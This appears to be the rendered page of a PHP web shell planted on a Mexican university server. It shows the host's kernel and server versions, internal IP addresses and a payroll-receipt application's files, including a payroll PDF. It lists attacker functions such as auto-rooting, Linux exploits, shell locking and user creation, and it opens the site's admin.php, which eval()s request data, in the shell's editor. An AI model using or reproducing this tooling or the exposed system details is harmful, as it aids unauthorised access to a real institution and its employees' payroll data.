Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
recibos /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
ftp
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
leerpdf
[ DIR ]
drwxrwxr-x
pdf
[ DIR ]
drwxrwxr-x
pdfs
[ DIR ]
drwxrwxr-x
recibos
[ DIR ]
drwxrwxr-x
subir
[ DIR ]
drwxrwxr-x
subir2
[ DIR ]
drwxrwxr-x
tabladinamica
[ DIR ]
drwxrwxr-x
actualiza.php
530
B
-rwxrwxr-x
admin.php
2.15
KB
-rwxrwxr-x
buscar.php
2.37
KB
-rwxrwxr-x
cabecera.php
1.08
KB
-rwxrwxr-x
conexion.php
220
B
-rwxrwxr-x
crear.php
649
B
-rwxrwxr-x
funciones.php
1.79
KB
-rwxrwxr-x
index.php
321
B
-rwxrwxr-x
login.php
3
KB
-rwxrwxr-x
nomina.12.2019.pdf
563.46
KB
-rwxrwxr-x
respaldofunciones.php
2.85
KB
-rwxrwxr-x
sample.html
604.89
KB
-rwxrwxr-x
sample.pdf
563.46
KB
-rwxrwxr-x
sample.xml
455.67
KB
-rwxrwxr-x
subir.php
529
B
-rwxrwxr-x
super.php
38
B
-rwxrwxr-x
usuario.php
3.43
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php include "cabecera.php"; ?> <!DOCTYPE html> <html lang="es"> <meta charset="UTF-8"> <!--<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">--> <style> .cabecera{ padding: 10px; } .cabecera img{ height:25px; float: right; margin-top: 4px; margin-right: 7px; } .formulario{ margin-top: 5px; background-color:#007bff; padding: 20px; color: white; border-radius: 5px; } </style> <div class="container-fluid"> <div class="row cabecera"> <div class="col-lg-12"> <h1>Bienvenido/a administrador/a: <a href="login.php?logout=0"><img src="img/cerrar2.png" alt="Cerrar sesión"></a></h1> </div> <div class="col-xl-12"> <h3><?php echo $_SESSION["nombre"]; ?> </h3> </div> </div> <div class="row datos"> <div class="col-12"> <form class="formulario" id="formulario_subir" enctype="multipart/form-data" method="post"> <input type="file" name="archivo" class=" btn-info" id="archivo" ><br> <input type="hidden" name="" id="rfc" value="<?php echo $_SESSION['usuario']?>"> <br> <input type="button" value="Subir archivo de nómina" class="btn btn-success" onclick="subir()"> <input type="button" value="Procesar nómina" class="btn btn-info " onclick="crear()"> </form> </div> </div> </div> <div class="container-fluid"> <div id="datos"></div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script src="js/crear.js"></script> <script> function crear(){ var datos=JSON.parse($('#datos').val()); var json=eval(datos['json']); var q=datos['q']; var a=datos['a']; var path=datos['path']; for (i=0;i<=json.length;i++){ nomina(json[i].nombre,json[i].rfc,json[i].fecha,i+1,q,a,path,json.length); } } </script>
Close